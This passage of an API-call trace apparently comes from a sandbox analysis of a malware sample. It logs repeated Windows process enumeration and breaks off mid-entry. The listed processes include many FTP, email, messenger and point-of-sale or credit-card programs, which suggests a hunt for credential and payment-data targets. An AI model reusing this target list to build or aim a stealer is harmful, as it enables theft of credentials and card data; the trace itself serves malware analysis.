th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0147.416] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0147.417] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0147.419] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0147.420] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0147.422] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0147.424] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0147.425] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0147.427] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0147.428] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0147.430] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0147.432] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0147.435] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0147.438] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0147.440] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0147.445] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0147.447] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0147.449] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0147.451] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0147.453] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0147.456] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0147.459] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0147.461] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0147.476] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0147.480] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0147.482] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0147.484] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0147.487] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0147.489] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0147.491] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0147.501] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0147.504] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0147.506] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0147.508] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0147.510] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0147.512] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0147.514] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0147.515] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0147.519] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0147.521] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0147.522] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0147.524] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0147.526] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0147.528] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0147.530] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0147.532] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0147.534] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0147.535] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0147.537] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0147.544] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0147.546] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0147.548] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0147.550] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0147.551] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0147.553] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0147.555] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0147.556] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0147.558] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0147.560] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0147.562] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0147.564] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0147.566] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0147.567] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0147.570] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0147.571] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0147.573] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0147.575] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0147.576] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0147.578] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x7c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0147.581] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x7c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0147.583] CloseHandle (hObject=0x1a80) returned 1 [0147.583] Sleep (dwMilliseconds=0x64) [0147.707] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd4 [0147.722] Process32First (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.723] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0147.725] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0147.727] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0147.728] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0147.730] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0147.731] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0147.733] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0147.736] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0147.738] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.739] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.741] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0147.743] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.774] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.777] Process32Next (in: hSnapshot=0x1cd4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, 